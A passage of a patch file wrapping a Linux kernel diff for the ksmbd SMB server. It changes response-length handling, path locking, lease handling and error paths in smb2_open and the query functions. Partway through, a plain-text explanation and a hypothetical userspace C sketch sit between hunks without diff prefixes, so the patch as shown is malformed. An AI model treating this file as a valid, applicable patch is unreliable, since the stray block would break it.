+ 	ksmbd_destroy_file_table(&sess->file_table);
+@@ -2178,6 +2220,14 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 	ksmbd_free_user(sess->user);
+ 	sess->user = NULL;
+ 	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
++
++	rsp->StructureSize = cpu_to_le16(4);
++	err = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_logoff_rsp));
++	if (err) {
++		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++		smb2_set_err_rsp(work);
++		return err;
++	}
+ 	return 0;
+ }
+ 
+@@ -2230,7 +2280,10 @@ static noinline int create_smb2_pipe(struct ksmbd_work *work)
+ 	rsp->CreateContextsOffset = 0;
+ 	rsp->CreateContextsLength = 0;
+ 
+-	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1*/
++	err = ksmbd_iov_pin_rsp(work, rsp, offsetof(struct smb2_create_rsp, Buffer));
++	if (err)
++		goto out;
++
+ 	kfree(name);
+ 	return 0;
+ 
+@@ -2309,7 +2362,7 @@ static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
+ 			/* delete the EA only when it exits */
+ 			if (rc > 0) {
+ 				rc = ksmbd_vfs_remove_xattr(user_ns,
+-							    path->dentry,
++							    path,
+ 							    attr_name);
+ 
+ 				if (rc < 0) {
+@@ -2323,9 +2376,9 @@ static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
+ 			/* if the EA doesn't exist, just do nothing. */
+ 			rc = 0;
+ 		} else {
+-			rc = ksmbd_vfs_setxattr(user_ns,
+-						path->dentry, attr_name, value,
+-						le16_to_cpu(eabuf->EaValueLength), 0);
++			rc = ksmbd_vfs_setxattr(user_ns, path, attr_name, value,
++						le16_to_cpu(eabuf->EaValueLength),
++						0, true);
+ 			if (rc < 0) {
+ 				ksmbd_debug(SMB,
+ 					    "ksmbd_vfs_setxattr is failed(%d)\n",
+@@ -2388,8 +2441,7 @@ static noinline int smb2_set_stream_name_xattr(const struct path *path,
+ 		return -EBADF;
+ 	}
+ 
+-	rc = ksmbd_vfs_setxattr(user_ns, path->dentry,
+-				xattr_stream_name, NULL, 0, 0);
++	rc = ksmbd_vfs_setxattr(user_ns, path, xattr_stream_name, NULL, 0, 0, false);
+ 	if (rc < 0)
+ 		pr_err("Failed to store XATTR stream name :%d\n", rc);
+ 	return 0;
+@@ -2417,7 +2469,7 @@ static int smb2_remove_smb_xattrs(const struct path *path)
+ 		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN) &&
+ 		    !strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
+ 			     STREAM_PREFIX_LEN)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, path->dentry,
++			err = ksmbd_vfs_remove_xattr(user_ns, path,
+ 						     name);
+ 			if (err)
+ 				ksmbd_debug(SMB, "remove xattr failed : %s\n",
+@@ -2464,8 +2516,7 @@ static void smb2_new_xattrs(struct ksmbd_tree_connect *tcon, const struct path *
+ 	da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
+ 		XATTR_DOSINFO_ITIME;
+ 
+-	rc = ksmbd_vfs_set_dos_attrib_xattr(mnt_user_ns(path->mnt),
+-					    path->dentry, &da);
++	rc = ksmbd_vfs_set_dos_attrib_xattr(mnt_user_ns(path->mnt), path, &da, true);
+ 	if (rc)
+ 		ksmbd_debug(SMB, "failed to store file attribute into xattr\n");
+ }
+@@ -2492,8 +2543,9 @@ static void smb2_update_xattrs(struct ksmbd_tree_connect *tcon,
+ 	}
+ }
+ 
+-static int smb2_creat(struct ksmbd_work *work, struct path *path, char *name,
+-		      int open_flags, umode_t posix_mode, bool is_dir)
++static int smb2_creat(struct ksmbd_work *work, struct path *parent_path,
++		      struct path *path, char *name, int open_flags,
++		      umode_t posix_mode, bool is_dir)
+ {
+ 	struct ksmbd_tree_connect *tcon = work->tcon;
+ 	struct ksmbd_share_config *share = tcon->share_conf;
+@@ -2520,7 +2572,7 @@ static int smb2_creat(struct ksmbd_work *work, struct path *path, char *name,
+ 			return rc;
+ 	}
+ 
+-	rc = ksmbd_vfs_kern_path(work, name, 0, path, 0);
++	rc = ksmbd_vfs_kern_path_locked(work, name, 0, parent_path, path, 0);
+ 	if (rc) {
+ 		pr_err("cannot get linux path (%s), err = %d\n",
+ 		       name, rc);
+@@ -2554,7 +2606,7 @@ static int smb2_create_sd_buffer(struct ksmbd_work *work,
+ 	    sizeof(struct create_sd_buf_req))
+ 		return -EINVAL;
+ 	return set_info_sec(work->conn, work->tcon, path, &sd_buf->ntsd,
+-			    le32_to_cpu(sd_buf->ccontext.DataLength), true);
++			    le32_to_cpu(sd_buf->ccontext.DataLength), true, false);
+ }
+ 
+ static void ksmbd_acls_fattr(struct smb_fattr *fattr,
+@@ -2590,7 +2642,7 @@ int smb2_open(struct ksmbd_work *work)
+ 	struct ksmbd_tree_connect *tcon = work->tcon;
+ 	struct smb2_create_req *req;
+ 	struct smb2_create_rsp *rsp;
+-	struct path path;
++	struct path path, parent_path;
+ 	struct ksmbd_share_config *share = tcon->share_conf;
+ 	struct ksmbd_file *fp = NULL;
+ 	struct file *filp = NULL;
+@@ -2614,6 +2666,7 @@ int smb2_open(struct ksmbd_work *work)
+ 	u64 time;
+ 	umode_t posix_mode = 0;
+ 	__le32 daccess, maximal_access = 0;
++	int iov_len = 0;
+ 
+ 	WORK_BUFFERS(work, req, rsp);
+ 
+@@ -2635,7 +2688,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		    *(char *)req->Buffer == '\\') {
+ 			pr_err("not allow directory name included leading slash\n");
+ 			rc = -EINVAL;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 
+ 		name = smb2_get_name(req->Buffer,
+@@ -2646,7 +2699,7 @@ int smb2_open(struct ksmbd_work *work)
+ 			if (rc != -ENOMEM)
+ 				rc = -ENOENT;
+ 			name = NULL;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 
+ 		ksmbd_debug(SMB, "converted name = %s\n", name);
+@@ -2654,48 +2707,44 @@ int smb2_open(struct ksmbd_work *work)
+ 			if (!test_share_config_flag(work->tcon->share_conf,
+ 						    KSMBD_SHARE_FLAG_STREAMS)) {
+ 				rc = -EBADF;
+-				goto err_out1;
++				goto err_out2;
+ 			}
+ 			rc = parse_stream_name(name, &stream_name, &s_type);
+ 			if (rc < 0)
+-				goto err_out1;
++				goto err_out2;
+ 		}
+ 
+ 		rc = ksmbd_validate_filename(name);
+ 		if (rc < 0)
+-			goto err_out1;
++			goto err_out2;
+ 
+ 		if (ksmbd_share_veto_filename(share, name)) {
+ 			rc = -ENOENT;
+ 			ksmbd_debug(SMB, "Reject open(), vetoed file: %s\n",
+ 				    name);
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 	} else {
+ 		name = kstrdup("", GFP_KERNEL);
+ 		if (!name) {
+ 			rc = -ENOMEM;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 	}
+ 
+-	req_op_level = req->RequestedOplockLevel;
+-	if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE)
+-		lc = parse_lease_state(req);
+-
+ 	if (le32_to_cpu(req->ImpersonationLevel) > le32_to_cpu(IL_DELEGATE)) {
+ 		pr_err("Invalid impersonationlevel : 0x%x\n",
+ 		       le32_to_cpu(req->ImpersonationLevel));
+ 		rc = -EIO;
+ 		rsp->hdr.Status = STATUS_BAD_IMPERSONATION_LEVEL;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+ 	if (req->CreateOptions && !(req->CreateOptions & CREATE_OPTIONS_MASK_LE)) {
+ 		pr_err("Invalid create options : 0x%x\n",
+ 		       le32_to_cpu(req->CreateOptions));
+ 		rc = -EINVAL;
+-		goto err_out1;
++		goto err_out2;
+ 	} else {
+ 		if (req->CreateOptions & FILE_SEQUENTIAL_ONLY_LE &&
+ 		    req->CreateOptions & FILE_RANDOM_ACCESS_LE)
+@@ -2705,13 +2754,13 @@ int smb2_open(struct ksmbd_work *work)
+ 		    (FILE_OPEN_BY_FILE_ID_LE | CREATE_TREE_CONNECTION |
+ 		     FILE_RESERVE_OPFILTER_LE)) {
+ 			rc = -EOPNOTSUPP;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 
+ 		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
+ 			if (req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE) {
+ 				rc = -EINVAL;
+-				goto err_out1;
++				goto err_out2;
+ 			} else if (req->CreateOptions & FILE_NO_COMPRESSION_LE) {
+ 				req->CreateOptions = ~(FILE_NO_COMPRESSION_LE);
+ 			}
+@@ -2723,21 +2772,21 @@ int smb2_open(struct ksmbd_work *work)
+ 		pr_err("Invalid create disposition : 0x%x\n",
+ 		       le32_to_cpu(req->CreateDisposition));
+ 		rc = -EINVAL;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+ 	if (!(req->DesiredAccess & DESIRED_ACCESS_MASK)) {
+ 		pr_err("Invalid desired access : 0x%x\n",
+ 		       le32_to_cpu(req->DesiredAccess));
+ 		rc = -EACCES;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+ 	if (req->FileAttributes && !(req->FileAttributes & FILE_ATTRIBUTE_MASK_LE)) {
+ 		pr_err("Invalid file attribute : 0x%x\n",
+ 		       le32_to_cpu(req->FileAttributes));
+ 		rc = -EINVAL;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+ 	if (req->CreateContextsOffset) {
+@@ -2745,19 +2794,19 @@ int smb2_open(struct ksmbd_work *work)
+ 		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+-			goto err_out1;
++			goto err_out2;
+ 		} else if (context) {
+ 			ea_buf = (struct create_ea_buf_req *)context;
+ 			if (le16_to_cpu(context->DataOffset) +
+ 			    le32_to_cpu(context->DataLength) <
+ 			    sizeof(struct create_ea_buf_req)) {
+ 				rc = -EINVAL;
+-				goto err_out1;
++				goto err_out2;
+ 			}
+ 			if (req->CreateOptions & FILE_NO_EA_KNOWLEDGE_LE) {
+ 				rsp->hdr.Status = STATUS_ACCESS_DENIED;
+ 				rc = -EACCES;
+-				goto err_out1;
++				goto err_out2;
+ 			}
+ 		}
+ 
+@@ -2765,7 +2814,7 @@ int smb2_open(struct ksmbd_work *work)
+ 						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+-			goto err_out1;
++			goto err_out2;
+ 		} else if (context) {
+ 			ksmbd_debug(SMB,
+ 				    "get query maximal access context\n");
+@@ -2776,11 +2825,11 @@ int smb2_open(struct ksmbd_work *work)
+ 						 SMB2_CREATE_TIMEWARP_REQUEST, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+-			goto err_out1;
++			goto err_out2;
+ 		} else if (context) {
+ 			ksmbd_debug(SMB, "get timewarp context\n");
+ 			rc = -EBADF;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 
+ 		if (tcon->posix_extensions) {
+@@ -2788,7 +2837,7 @@ int smb2_open(struct ksmbd_work *work)
+ 							 SMB2_CREATE_TAG_POSIX, 16);
+ 			if (IS_ERR(context)) {
+ 				rc = PTR_ERR(context);
+-				goto err_out1;
++				goto err_out2;
+ 			} else if (context) {
+ 				struct create_posix *posix =
+ 					(struct create_posix *)context;
+@@ -2796,7 +2845,7 @@ int smb2_open(struct ksmbd_work *work)
+ 				    le32_to_cpu(context->DataLength) <
+ 				    sizeof(struct create_posix) - 4) {
+ 					rc = -EINVAL;
+-					goto err_out1;
++					goto err_out2;
+ 				}
+ 				ksmbd_debug(SMB, "get posix context\n");
+ 
+@@ -2808,11 +2857,14 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	if (ksmbd_override_fsids(work)) {
+ 		rc = -ENOMEM;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+-	rc = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, 1);
++	rc = ksmbd_vfs_kern_path_locked(work, name, LOOKUP_NO_SYMLINKS,
++					&parent_path, &path, 1);
+ 	if (!rc) {
++		file_present = true;
++
+ 		if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE) {
+ 			/*
+ 			 * If file exists with under flags, return access
+@@ -2821,7 +2873,6 @@ int smb2_open(struct ksmbd_work *work)
+ 			if (req->CreateDisposition == FILE_OVERWRITE_IF_LE ||
+ 			    req->CreateDisposition == FILE_OPEN_IF_LE) {
+ 				rc = -EACCES;
+-				path_put(&path);
+ 				goto err_out;
+ 			}
+ 
+@@ -2829,26 +2880,23 @@ int smb2_open(struct ksmbd_work *work)
+ 				ksmbd_debug(SMB,
+ 					    "User does not have write permission\n");
+ 				rc = -EACCES;
+-				path_put(&path);
+ 				goto err_out;
+ 			}
+ 		} else if (d_is_symlink(path.dentry)) {
+ 			rc = -EACCES;
+-			path_put(&path);
+ 			goto err_out;
+ 		}
+-	}
+ 
+-	if (rc) {
++		file_present = true;
++		user_ns = mnt_user_ns(path.mnt);
++	} else {
+ 		if (rc != -ENOENT)
+ 			goto err_out;
+ 		ksmbd_debug(SMB, "can not get linux path for %s, rc = %d\n",
+ 			    name, rc);
+ 		rc = 0;
+-	} else {
+-		file_present = true;
+-		user_ns = mnt_user_ns(path.mnt);
+ 	}
++
+ 	if (stream_name) {
+ 		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
+ 			if (s_type == DATA_STREAM) {
+@@ -2910,11 +2958,9 @@ int smb2_open(struct ksmbd_work *work)
+ 		if (!file_present) {
+ 			daccess = cpu_to_le32(GENERIC_ALL_FLAGS);
+ 		} else {
+-			rc = ksmbd_vfs_query_maximal_access(user_ns,
++			ksmbd_vfs_query_maximal_access(user_ns,
+ 							    path.dentry,
+ 							    &daccess);
+-			if (rc)
+-				goto err_out;
+ 			already_permitted = true;
+ 		}
+ 		maximal_access = daccess;
+@@ -2935,7 +2981,8 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	/* create file if not present */
+ 	if (!file_present) {
+-		rc = smb2_creat(work, &path, name, open_flags, posix_mode,
++		rc = smb2_creat(work, &parent_path, &path, name, open_flags,
++				posix_mode,
+ 				req->CreateOptions & FILE_DIRECTORY_FILE_LE);
+ 		if (rc) {
+ 			if (rc == -ENOENT) {
+@@ -2976,15 +3023,16 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 			if ((daccess & FILE_DELETE_LE) ||
+ 			    (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
+-				rc = ksmbd_vfs_may_delete(user_ns,
+-							  path.dentry);
++				rc = inode_permission(user_ns,
++						      d_inode(path.dentry->d_parent),
++						      MAY_EXEC | MAY_WRITE);
+ 				if (rc)
+ 					goto err_out;
+ 			}
+ 		}
+ 	}
+ 
+-	rc = ksmbd_query_inode_status(d_inode(path.dentry->d_parent));
++	rc = ksmbd_query_inode_status(path.dentry->d_parent);
+ 	if (rc == KSMBD_INODE_STATUS_PENDING_DELETE) {
+ 		rc = -EBUSY;
+ 		goto err_out;
+@@ -3040,7 +3088,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		struct inode *inode = d_inode(path.dentry);
+ 
+ 		posix_acl_rc = ksmbd_vfs_inherit_posix_acl(user_ns,
+-							   inode,
++							   &path,
+ 							   d_inode(path.dentry->d_parent));
+ 		if (posix_acl_rc)
+ 			ksmbd_debug(SMB, "inherit posix acl failed : %d\n", posix_acl_rc);
+@@ -3056,7 +3104,7 @@ int smb2_open(struct ksmbd_work *work)
+ 			if (rc) {
+ 				if (posix_acl_rc)
+ 					ksmbd_vfs_set_init_posix_acl(user_ns,
+-								     inode);
++								     &path);
+ 
+ 				if (test_share_config_flag(work->tcon->share_conf,
+ 							   KSMBD_SHARE_FLAG_ACL_XATTR)) {
+@@ -3096,9 +3144,10 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 					rc = ksmbd_vfs_set_sd_xattr(conn,
+ 								    user_ns,
+-								    path.dentry,
++								    &path,
+ 								    pntsd,
+-								    pntsd_size);
++								    pntsd_size,
++								    false);
+ 					kfree(pntsd);
+ 					if (rc)
+ 						pr_err("failed to store ntacl in xattr : %d\n",
+@@ -3121,11 +3170,6 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	fp->attrib_only = !(req->DesiredAccess & ~(FILE_READ_ATTRIBUTES_LE |
+ 			FILE_WRITE_ATTRIBUTES_LE | FILE_SYNCHRONIZE_LE));
+-	if (!S_ISDIR(file_inode(filp)->i_mode) && open_flags & O_TRUNC &&
+-	    !fp->attrib_only && !stream_name) {
+-		smb_break_all_oplock(work, fp);
+-		need_truncate = 1;
+-	}
+ 
+ 	/* fp should be searchable through ksmbd_inode.m_fp_list
+ 	 * after daccess, saccess, attrib_only, and stream are
+@@ -3141,23 +3185,43 @@ int smb2_open(struct ksmbd_work *work)
+ 		goto err_out;
+ 	}
+ 
++	if (file_present || created)
++		ksmbd_vfs_kern_path_unlock(&parent_path, &path);
++
++	if (!S_ISDIR(file_inode(filp)->i_mode) && open_flags & O_TRUNC &&
++	    !fp->attrib_only && !stream_name) {
++		smb_break_all_oplock(work, fp);
++		need_truncate = 1;
++	}
++
++	req_op_level = req->RequestedOplockLevel;
++	if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE)
++		lc = parse_lease_state(req, S_ISDIR(file_inode(filp)->i_mode));
++
+ 	share_ret = ksmbd_smb_check_shared_mode(fp->filp, fp);
+ 	if (!test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_OPLOCKS) ||
+ 	    (req_op_level == SMB2_OPLOCK_LEVEL_LEASE &&
+ 	     !(conn->vals->capabilities & SMB2_GLOBAL_CAP_LEASING))) {
+ 		if (share_ret < 0 && !S_ISDIR(file_inode(fp->filp)->i_mode)) {
+ 			rc = share_ret;
+-			goto err_out;
++			goto err_out1;
+ 		}
+ 	} else {
+ 		if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE) {
++			/*
++			 * Compare the parent lease using the parent key. If
++			 * there is no lease that has the same parent key, send
++			 * a lease break notification.
++			 */
++			smb_send_parent_lease_break_noti(fp, lc);
++
+ 			req_op_level = smb2_map_lease_to_oplock(lc->req_state);
+ 			ksmbd_debug(SMB,
+ 				    "lease req for(%s) req oplock state 0x%x, lease state 0x%x\n",
+ 				    name, req_op_level, lc->req_state);
+ 			rc = find_same_lease_key(sess, fp->f_ci, lc);
+ 			if (rc)
+-				goto err_out;
++				goto err_out1;
+ 		} else if (open_flags == O_RDONLY &&
+ 			   (req_op_level == SMB2_OPLOCK_LEVEL_BATCH ||
+ 			    req_op_level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
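For reference, the parent-lease check described by the new comment in the
hunk above reduces to a 16-byte key comparison; a minimal userspace sketch
of that idea, with hypothetical type and field names rather than the real
ksmbd structures:

    #include <stdbool.h>
    #include <string.h>

    #define LEASE_KEY_SIZE 16

    /* Hypothetical stand-ins for the ksmbd lease structures. */
    struct lease_ctx {
            unsigned char parent_lease_key[LEASE_KEY_SIZE];
    };

    struct lease {
            unsigned char lease_key[LEASE_KEY_SIZE];
    };

    /*
     * True when the open carries a parent lease key matching an existing
     * directory lease; when nothing matches, the server sends a lease
     * break notification instead.
     */
    static bool parent_lease_matches(const struct lease_ctx *req,
                                     const struct lease *dir_lease)
    {
            return memcmp(req->parent_lease_key, dir_lease->lease_key,
                          LEASE_KEY_SIZE) == 0;
    }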
+@@ -3168,16 +3232,16 @@ int smb2_open(struct ksmbd_work *work)
+ 				      le32_to_cpu(req->hdr.Id.SyncId.TreeId),
+ 				      lc, share_ret);
+ 		if (rc < 0)
+-			goto err_out;
++			goto err_out1;
+ 	}
+ 
+ 	if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)
+ 		ksmbd_fd_set_delete_on_close(fp, file_info);
+ 
+ 	if (need_truncate) {
+-		rc = smb2_create_truncate(&path);
++		rc = smb2_create_truncate(&fp->filp->f_path);
+ 		if (rc)
+-			goto err_out;
++			goto err_out1;
+ 	}
+ 
+ 	if (req->CreateContextsOffset) {
+@@ -3187,7 +3251,7 @@ int smb2_open(struct ksmbd_work *work)
+ 					SMB2_CREATE_ALLOCATION_SIZE, 4);
+ 		if (IS_ERR(az_req)) {
+ 			rc = PTR_ERR(az_req);
+-			goto err_out;
++			goto err_out1;
+ 		} else if (az_req) {
+ 			loff_t alloc_size;
+ 			int err;
+@@ -3196,7 +3260,7 @@ int smb2_open(struct ksmbd_work *work)
+ 			    le32_to_cpu(az_req->ccontext.DataLength) <
+ 			    sizeof(struct create_alloc_size_req)) {
+ 				rc = -EINVAL;
+-				goto err_out;
++				goto err_out1;
+ 			}
+ 			alloc_size = le64_to_cpu(az_req->AllocationSize);
+ 			ksmbd_debug(SMB,
+@@ -3214,7 +3278,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+-			goto err_out;
++			goto err_out1;
+ 		} else if (context) {
+ 			ksmbd_debug(SMB, "get query on disk id context\n");
+ 			query_disk_id = 1;
+@@ -3223,7 +3287,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	rc = ksmbd_vfs_getattr(&path, &stat);
+ 	if (rc)
+-		goto err_out;
++		goto err_out1;
+ 
+ 	if (stat.result_mask & STATX_BTIME)
+ 		fp->create_time = ksmbd_UnixTimeToNT(stat.btime);
+@@ -3266,7 +3330,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	rsp->CreateContextsOffset = 0;
+ 	rsp->CreateContextsLength = 0;
+-	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1*/
++	iov_len = offsetof(struct smb2_create_rsp, Buffer);
+ 
+ 	/* If a lease was requested, send a lease context response */
+ 	if (opinfo && opinfo->is_lease) {
+@@ -3281,8 +3345,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		create_lease_buf(rsp->Buffer, opinfo->o_lease);
+ 		le32_add_cpu(&rsp->CreateContextsLength,
+ 			     conn->vals->create_lease_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_lease_size);
++		iov_len += conn->vals->create_lease_size;
+ 		next_ptr = &lease_ccontext->Next;
+ 		next_off = conn->vals->create_lease_size;
+ 	}
+@@ -3302,8 +3365,7 @@ int smb2_open(struct ksmbd_work *work)
+ 				le32_to_cpu(maximal_access));
+ 		le32_add_cpu(&rsp->CreateContextsLength,
+ 			     conn->vals->create_mxac_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_mxac_size);
++		iov_len += conn->vals->create_mxac_size;
+ 		if (next_ptr)
+ 			*next_ptr = cpu_to_le32(next_off);
+ 		next_ptr = &mxac_ccontext->Next;
+@@ -3321,8 +3383,7 @@ int smb2_open(struct ksmbd_work *work)
+ 				stat.ino, tcon->id);
+ 		le32_add_cpu(&rsp->CreateContextsLength,
+ 			     conn->vals->create_disk_id_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_disk_id_size);
++		iov_len += conn->vals->create_disk_id_size;
+ 		if (next_ptr)
+ 			*next_ptr = cpu_to_le32(next_off);
+ 		next_ptr = &disk_id_ccontext->Next;
+@@ -3336,8 +3397,7 @@ int smb2_open(struct ksmbd_work *work)
+ 				fp);
+ 		le32_add_cpu(&rsp->CreateContextsLength,
+ 			     conn->vals->create_posix_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_posix_size);
++		iov_len += conn->vals->create_posix_size;
+ 		if (next_ptr)
+ 			*next_ptr = cpu_to_le32(next_off);
+ 	}
+@@ -3348,10 +3408,17 @@ int smb2_open(struct ksmbd_work *work)
+ 	}
+ 
+ err_out:
+-	if (file_present || created)
+-		path_put(&path);
+-	ksmbd_revert_fsids(work);
++	if (rc && (file_present || created))
++		ksmbd_vfs_kern_path_unlock(&parent_path, &path);
++
+ err_out1:
++	ksmbd_revert_fsids(work);
++
++err_out2:
++	if (!rc) {
++		ksmbd_update_fstate(&work->sess->file_table, fp, FP_INITED);
++		rc = ksmbd_iov_pin_rsp(work, (void *)rsp, iov_len);
++	}
+ 	if (rc) {
+ 		if (rc == -EINVAL)
+ 			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+@@ -3525,7 +3592,7 @@ static int smb2_populate_readdir_entry(struct ksmbd_conn *conn, int info_level,
+ 		goto free_conv_name;
+ 	}
+ 
+-	struct_sz = readdir_info_level_struct_sz(info_level) - 1 + conv_len;
++	struct_sz = readdir_info_level_struct_sz(info_level) + conv_len;
+ 	next_entry_offset = ALIGN(struct_sz, KSMBD_DIR_INFO_ALIGNMENT);
+ 	d_info->last_entry_off_align = next_entry_offset - struct_sz;
+ 
+@@ -3777,7 +3844,7 @@ static int reserve_populate_dentry(struct ksmbd_dir_info *d_info,
+ 		return -EOPNOTSUPP;
+ 
+ 	conv_len = (d_info->name_len + 1) * 2;
+-	next_entry_offset = ALIGN(struct_sz - 1 + conv_len,
++	next_entry_offset = ALIGN(struct_sz + conv_len,
+ 				  KSMBD_DIR_INFO_ALIGNMENT);
+ 
+ 	if (next_entry_offset > d_info->out_buf_len) {
+@@ -4077,7 +4144,10 @@ int smb2_query_dir(struct ksmbd_work *work)
+ 		rsp->OutputBufferOffset = cpu_to_le16(0);
+ 		rsp->OutputBufferLength = cpu_to_le32(0);
+ 		rsp->Buffer[0] = 0;
+-		inc_rfc1001_len(work->response_buf, 9);
++		rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
++				       sizeof(struct smb2_query_directory_rsp));
++		if (rc)
++			goto err_out;
+ 	} else {
+ no_buf_len:
+ 		((struct file_directory_info *)
+@@ -4089,7 +4159,11 @@ no_buf_len:
+ 		rsp->StructureSize = cpu_to_le16(9);
+ 		rsp->OutputBufferOffset = cpu_to_le16(72);
+ 		rsp->OutputBufferLength = cpu_to_le32(d_info.data_count);
+-		inc_rfc1001_len(work->response_buf, 8 + d_info.data_count);
++		rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
++				       offsetof(struct smb2_query_directory_rsp, Buffer) +
++				       d_info.data_count);
++		if (rc)
++			goto err_out;
+ 	}
+ 
+ 	kfree(srch_ptr);
+@@ -4130,27 +4204,18 @@ err_out2:
+  * @reqOutputBufferLength:	max buffer length expected in command response
+  * @rsp:		query info response buffer contains output buffer length
+  * @rsp_org:		base response buffer pointer in case of chained response
+- * @infoclass_size:	query info class response buffer size
+  *
+  * Return:	0 on success, otherwise error
+  */
+ static int buffer_check_err(int reqOutputBufferLength,
+ 			    struct smb2_query_info_rsp *rsp,
+-			    void *rsp_org, int infoclass_size)
++			    void *rsp_org)
+ {
+ 	if (reqOutputBufferLength < le32_to_cpu(rsp->OutputBufferLength)) {
+-		if (reqOutputBufferLength < infoclass_size) {
+-			pr_err("Invalid Buffer Size Requested\n");
+-			rsp->hdr.Status = STATUS_INFO_LENGTH_MISMATCH;
+-			*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr));
+-			return -EINVAL;
+-		}
+-
+-		ksmbd_debug(SMB, "Buffer Overflow\n");
+-		rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
+-		*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr) +
+-				reqOutputBufferLength);
+-		rsp->OutputBufferLength = cpu_to_le32(reqOutputBufferLength);
++		pr_err("Invalid Buffer Size Requested\n");
++		rsp->hdr.Status = STATUS_INFO_LENGTH_MISMATCH;
++		*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr));
++		return -EINVAL;
+ 	}
+ 	return 0;
+ }
+@@ -4169,7 +4234,6 @@ static void get_standard_info_pipe(struct smb2_query_info_rsp *rsp,
+ 	sinfo->Directory = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_standard_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_standard_info));
+ }
+ 
+ static void get_internal_info_pipe(struct smb2_query_info_rsp *rsp, u64 num,
+@@ -4183,7 +4247,6 @@ static void get_internal_info_pipe(struct smb2_query_info_rsp *rsp, u64 num,
+ 	file_info->IndexNumber = cpu_to_le64(num | (1ULL << 63));
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_internal_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
+ }
+ 
+ static int smb2_get_info_file_pipe(struct ksmbd_session *sess,
+@@ -4209,14 +4272,12 @@ static int smb2_get_info_file_pipe(struct ksmbd_session *sess,
+ 	case FILE_STANDARD_INFORMATION:
+ 		get_standard_info_pipe(rsp, rsp_org);
+ 		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, rsp_org,
+-				      FILE_STANDARD_INFORMATION_SIZE);
++				      rsp, rsp_org);
+ 		break;
+ 	case FILE_INTERNAL_INFORMATION:
+ 		get_internal_info_pipe(rsp, id, rsp_org);
+ 		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, rsp_org,
+-				      FILE_INTERNAL_INFORMATION_SIZE);
++				      rsp, rsp_org);
+ 		break;
+ 	default:
+ 		ksmbd_debug(SMB, "smb2_info_file_pipe for %u not supported\n",
+@@ -4384,7 +4445,6 @@ done:
+ 	if (rsp_data_cnt == 0)
+ 		rsp->hdr.Status = STATUS_NO_EAS_ON_FILE;
